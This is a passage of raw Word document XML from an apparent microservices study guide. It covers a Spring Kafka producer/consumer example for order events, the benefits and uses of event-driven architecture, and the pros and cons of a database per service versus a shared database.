      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: order-placed</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143F1CDE"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Producer Example using Spring Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54433309"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Autowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3109B790"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private KafkaTemplate&lt;String, String&gt; kafkaTemplate;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD3DA3D" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93" w:rsidP="008B3EF9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46684893"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public void placeOrder(Order order) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29B51741"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 Business logic to place order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2349E903"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String orderEvent = "New Order Placed: " + order.getId();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="657CEE1B"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kafkaTemplate.send("order-placed", orderEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C76FBB"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72161E51"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Step 2: Event Consumption (Consumer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5595EAE8"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The </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inventory Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> listens for the "New Order Placed" event to update inventory:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7361AC41"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Consumer subscribes to topic</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> order-placed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051A41FD"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Consumer Example using Spring Kafka</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B622A80"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KafkaListener(topics = "order-placed", groupId = "inventory-service")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6005550D"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public void consume(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479CCAC9"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 Business logic to update inventory based on order data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651C4C8C"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System.out.println("Inventory Service received message: " + message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B1744C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C74E7D"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Step 3: Event Processing &amp; Further Communication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341B0B2B"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After the </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inventory Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> updates inventory, it might produce another event:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8850E8"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Event</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: "Inventory Updated"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6494976A"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Topic</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: inventory-updated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3381B41F"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Shipping Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can then consume this event to start the shipment process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E7D159" w14:textId="77777777" w:rsidR="00FF6B93"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1EFCC6C">
          <v:rect id="_x0000_i2802" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0556ECC5"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Benefits of Event-Driven Architecture with Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C60633"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Loose Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E8BB0E"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Producers and consumers are decoupled, meaning they don't depend on each other’s availability. Consumers can process events at their own pace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485CCA8C"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Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD33B1F"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lastRenderedPageBreak/>
        <w:t>Kafka can handle a massive amount of data in real-time. By distributing the events across Kafka partitions and brokers, Kafka ensures that the system can scale horizontally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048FDB13"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Resilience</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD40DF8"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Kafka stores events in a distributed, fault-tolerant way. If a consumer fails, it can pick up from where it left off by consuming the event from the topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B28A10F"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Real-time Processing</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B79E9C"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Kafka enables near real-time event processing, where services react to events as soon as they are published.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4C7859"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Event Replay</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B1D894" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93"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Kafka retains events for a certain retention period, which allows consumers to replay events if needed, useful for event-driven workflows like auditing or reprocessing data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CE957C" w14:textId="77777777" w:rsidR="00FF6B93"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821C29">
          <v:rect id="_x0000_i2803" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68498937"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Common Use Cases for Kafka in Event-Driven Systems:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6821F4A5"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Microservices Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Services can communicate via events rather than direct API calls, allowing for better fault tolerance and easier scaling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B34CD5"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Log Aggregation</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka can collect logs from various services, process them in real-time, and provide insights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9780FC"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Real-Time Analytics</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka can be used to stream data into analytics platforms or data lakes for real-time data processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453C3C42"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Event Sourcing</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka can act as the event store in event sourcing architectures, where every change to the state of an entity is captured as an event.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E07B6E"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Data Pipelines</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka enables real-time data flow between systems, such as streaming data from a database to a data warehouse.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68EC016D" w14:textId="77777777" w:rsidR="00FF6B93"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57F0AF7">
          <v:rect id="_x0000_i2804" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FFA3F7" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A420DC1" w14:textId="77777777" w:rsidR="00FF6B93" w:rsidRPr="008B3EF9" w:rsidRDefault="00FF6B93"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Event-Driven Architecture (EDA) combined with Kafka is a powerful approach for building scalable, decoupled, and fault-tolerant systems. Kafka’s distributed nature, high throughput, and durability make it an ideal choice for handling event streams in complex systems. By using Kafka, you can build highly reactive, event-based systems where services communicate asynchronously, ensuring better scalability and flexibility.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C4DC3" w14:textId="0A81D15A" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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23D08A7">
          <v:rect id="_x0000_i2805" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5680F904" w14:textId="2FDC54CC" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="00B07073">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="680" w:name="_Toc196308160"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Database per service vs Shared Database: Pros and cons</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="680"/>
    </w:p>
    <w:p w14:paraId="4E341081" w14:textId="36D5A524" w:rsidR="00D056EB" w:rsidRPr="008B3EF9" w:rsidRDefault="00D056EB" w:rsidP="008B3EF9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Database per Service vs Shared Database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E69F7A9"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In a microservices architecture, one of the key decisions is how to manage the data layer. You can choose either </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Database per Service</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Shared Database</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Both approaches have their pros and cons, and the choice depends on the specific needs and goals of your system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024EDD39" w14:textId="77777777" w:rsidR="00D056EB"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59632D">
          <v:rect id="_x0000_i2806" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26898A7B"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1. Database per Service (Decentralized Data Management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05926210"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In this approach, each microservice has its own dedicated database. Each service is responsible for its own data and database schema, and it doesn’t directly interact with the data of other services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC8ADF8"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Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC6D8BD"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Loose Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337595BD"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Each service can be developed, deployed, and scaled independently without worrying about the data layer of other services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40FE4DA6"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Microservices can evolve their databases independently, allowing more flexibility in choosing database technologies that best fit the service’s requirements (e.g., SQL, NoSQL).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5B8E9"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Autonomy</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BC3BA28"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ervices are fully autonomous and don't rely on others for accessing their data, allowing them to be more resilient. One service’s failure doesn’t bring down the others due to shared data dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC95F95"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Improved Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E64A2CE"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Each service's database can be scaled independently based on its load. For example, if one service is experiencing high traffic, you can scale its database without affecting others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75C6A435"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Better Security and Isolation</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60966A55"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ince each service has its own database, access control is easier to enforce, reducing the risk of accidental or malicious access to other services’ data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057A1A12"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Independent Schema Evolution</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3846DA30"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ince the services are isolated, they can evolve their schemas without impacting other services. This makes it easier to implement database changes (e.g., migrations, table design).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="112D3F61"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lastRenderedPageBreak/>
        <w:t>Disaster Recovery and Fault Tolerance</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE51AD9"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ervices are less likely to be affected by database failures. A failure in one database does not affect the others.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6343A98F"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Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35CCABAA"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Data Duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E27500"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Data duplication may occur, as different services might need the same data but must store it separately. This can lead to inconsistencies and extra storage overhead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15AF251E"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Complex Data Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2FB880"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Managing consistency between services can be tricky. Since each service has its own database, achieving strong consistency (ACID) across services is difficult and may require eventual consistency or techniques like </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>saga pattern</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>eventual consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C60713"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Increased Complexity</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="780A586A"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Managing multiple databases adds operational complexity. You have to manage different types of databases, backup strategies, and migrations for each service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FEEC5BB"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Implementing cross-service transactions (if needed) can be more challenging without a global transaction manager.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46246E13"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Integration Overhead</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9FB241"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ervices need to communicate with each other via APIs, and synchronizing data between services (e.g., for reporting or analytics) can require complex data pipelines or event-driven architectures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F866245" w14:textId="77777777" w:rsidR="00D056EB"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93E5D5C">
          <v:rect id="_x0000_i2807" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7174D83D"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2. Shared Database (Centralized Data Management)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A98A0EF"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In this approach, all microservices share a common database. They access and modify the same data stored in the same database schema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C62C592"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Pros:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3442363A"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Simplified Data Management</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B270DC8"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ince all services are using the same database, data is centralized, making it easier to manage and access. You don't need to deal with data synchronization between databases.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5448B322"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Consistency</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="040CF466"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The database is consistent because there is a single source of truth for all data. Transactions across services are easier to manage using traditional ACID transactions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0008A6C1"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Faster Development</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66F1E858"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When microservices share a database, there’s no need to implement complex patterns like event sourcing or sagas for managing distributed transactions, making it faster and simpler to implement CRUD operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696B5494"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Reduced Data Duplication</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5598ACB9"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No data duplication occurs, as all services access and share the same data store, reducing storage requirements and ensuring consistency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2711D1"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Cons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE36C3F"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Tight Coupling</w:t>
      </w:r>
      <w:r w:rsidRPr="008B3EF9">
